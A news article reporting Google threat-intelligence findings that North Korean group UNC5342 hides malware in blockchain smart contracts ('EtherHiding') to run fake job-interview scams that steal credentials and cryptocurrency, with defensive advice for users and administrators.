North Korean hackers have started using a new method called EtherHiding to hide and deliver malware through blockchain smart contracts.
This technique is being used in fake job interview scams to steal cryptocurrency and personal data from unsuspecting victims.
According to Google’s Threat Intelligence Group, a North Korean state-sponsored group known as UNC5342 has been using EtherHiding since February in operations they call “Contagious Interview.” Researchers say this is the first time they have seen a government-backed hacking group use this kind of blockchain-based attack.
EtherHiding was first discovered by Guardio Labs in 2023. It works by embedding malicious code inside smart contracts on public blockchains like Binance Smart Chain or Ethereum. These smart contracts can store hidden malware scripts that hackers can retrieve at any time. Because of how blockchain technology functions, it gives attackers a high level of anonymity, makes takedowns extremely difficult, and allows them to update their malicious code cheaply and easily. Since the payloads are accessed using read-only blockchain calls, no visible transaction history is created, which makes detection even harder.
In these attacks, hackers typically pose as recruiters from fake companies such as BlockNovas LLC, Angeloper Agency, or SoftGlide LLC. They target software and web developers with fake job opportunities and trick them into downloading or running code as part of a so-called technical interview. This code is actually a downloader that connects to the blockchain to fetch the real malware.
Google’s researchers explain that the smart contract hosts a downloader known as JADESNOW, which interacts with the Ethereum blockchain to pull a second-stage payload. This payload is a JavaScript version of a spyware tool called InvisibleFerret, which is used for long-term spying on infected devices. The malware runs silently in memory and can even request additional components designed to steal login credentials, passwords, and cryptocurrency wallet information.
The hackers use both the Ethereum and Binance Smart Chain networks to host their malicious data, which makes their operations more complex and harder to trace. Google found that the attackers updated their malicious smart contract more than 20 times within the first four months of the campaign, spending just about $1.37 per update in gas fees. This shows how inexpensive and flexible this attack method is for cybercriminals.
Once the malware infects a device, it quietly waits for commands from its control server. It can execute commands, steal files, and send stolen data to external servers or even through Telegram. The credential-stealing part of the malware targets information stored in web browsers such as Chrome and Edge, including passwords, credit card data, and crypto wallet details from extensions like MetaMask and Phantom.
The use of EtherHiding by North Korean hackers is a worrying trend that makes it harder for security experts to track or shut down their campaigns. People should be extremely cautious when receiving job offers online, especially those that ask them to download files or run code. It’s always best to test such files in a secure, isolated environment before opening them.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Google recommends that system administrators restrict downloads of risky file types such as EXE, MSI, BAT, and DLL on corporate networks, enforce strict browser policies, and manage all web access and script permissions carefully to reduce exposure to such attacks.
